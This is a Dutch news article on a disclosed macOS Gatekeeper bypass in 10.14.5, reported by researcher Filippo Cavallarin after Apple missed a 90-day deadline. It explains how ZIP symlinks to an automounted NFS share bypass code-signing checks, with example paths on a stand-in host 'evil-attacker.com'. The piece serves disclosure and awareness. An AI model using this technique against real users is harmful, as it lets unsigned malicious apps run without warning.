Night
Night Nieuws 26 mei 2019

Beveiligingslek in Gatekeeper treft ook nieuwste versie macOS

Er is een lek ontdekt in het beveiligingsmechanisme van macOS, genaamd Gatekeeper. Het lek is nu door ontdekker Filippo Cavallarin publiek gemaakt omdat het in macOS 10.14.5 nog niet verholpen is.

Beveiligingsonderzoeker Filippo Cavallarin heeft het lek ontdekt en aan Apple doorgegeven. Toch is de fout in nog niet door Apple erkend of verholpen in macOS 10.14.5, wat op moment van publicatie de nieuwste versie is. Cavallarin heeft daarop besloten om de wijze waarop Gatekeeper te misleiden is, openbaar te maken.

Wat is Gatekeeper en wat gaat er mis?

Om het probleem te begrijpen vatten we eerst even kort samen wat Gatekeeper precies is. Het is – zoals de naam al doet vermoeden – een een systeemonderdeel van macOS dat voor beveiliging zorgt. Het verifieert applicaties onmiddellijk na het downloaden op authenticiteit. Wanneer een gebruiker buiten de Mac App Store om een app downloadt, wordt het gebruikt om te controleren of de code is ondertekend door Apple. Als de code niet (correct) is ondertekend, wordt de app niet geopend zonder dat de gebruiker daarvoor directe toestemming heeft gegeven.

Cavallarin schrijft echter op zijn blog dat de functionaliteit van Gatekeeper volledig kan worden omzeild. In de huidige implementatie beschouwt Apple’s beveiligingsmechanisme zowel externe schijven als netwerkshares als ‘veilige locaties’. Dit betekent dat alle toepassingen op die locaties kunnen worden uitgevoerd zonder de code opnieuw te controleren. Hij legt verder uit dat de gebruiker “gemakkelijk” kan worden misleid door een ​​gedeelde netwerkschijf op te zetten en dat alles in die map Gatekeeper ongestoord kan passeren.

macOS Gatekeeper
Klik/tap voor groter.

Het lek uitgelegd

Het lek bestaat eigenlijk uit twee onderdelen. Het eerste is een legitieme functie genaamd automount (ook bekend als autofs) waarmee een gebruiker een netwerkshare automatisch kan koppelen door een speciaal pad te openen. In dit geval een pad dat begint met /net/.

Bijvoorbeeld: ls /net/evil-attacker.com/sharedfolder/ laat macOS de inhoud van de ‘gedeelde map’ op de externe host (evil-attacker.com) lezen met behulp van NFS (Network File System). NFS wordt onder meer gebruikt om bestanden op een NAS te kunnen benaderen en is dus een noodzakelijk onderdeel van macOS. De tweede probleem is dat ZIP-bestanden symbolische koppelingen (symlinks) kunnen bevatten die naar een willekeurige locatie wijzen, inclusief automount-instelpunten. De software op nacOS die verantwoordelijk is voor het uitpakken van ZIP-bestanden voert geen verdere controle uit op deze symbolische koppelingen voordat ze zijn gemaakt.

Een voorbeeld van hoe dit zou werken

Het volgende scenario laat zien hoe deze exploit werkt. Een aanvaller maakt een ZIP0bestand met een symbolische koppeling naar een automount-eindpunt dat hij bestuurt. Bijvoorbeeld waarin Documenten verwijst naar /net/evil-atacker.com/Documents. Vervolgens verzendt hij het ZIP bestand naar het slachtoffer.

Het slachtoffer downloadt het schadelijke ZIP-bestand, pakt het uit en volgt de symlink. Het slachtoffer bevindt zich nu op een door de aanvaller beheerde locatie. Gatekeeper vertrouwt deze locatie echter. De gebruiker kan een door de aanvaller gemaakt bestand dat nu dus zonder enige waarschuwing openen. De Finder verbergt standaard de .app extensie, net als het volledige pad in de titelbalk. Dat maakt deze techniek zeer effectief want het is voor gebruikers moeilijk te herkennen.

Apple op de hoogte gesteld

Cavallarin zegt dat hij Apple al op 22 februari op de hoogte heeft gebracht van deze fout. Het bedrijf had dit dus moeten aanpakken met de release van macOS 10.14.5 van afgelopen week. In die release van macOS is de bug echter nog steeds aanwezig. Volgens Cavallarin reageert Apple ook niet meer op zijn e-mails. Omdat Apple de gestelde termijn van 90 dagen heeft overschreden zonder actie te ondernemen, maakte Cavallarin de fout openbaar. Er is ook een video van het probleem in Gatekeeper gemaakt. Dat kun je hieronder bekijken:

Reageer op artikel:
Beveiligingslek in Gatekeeper treft ook nieuwste versie macOS
Sluiten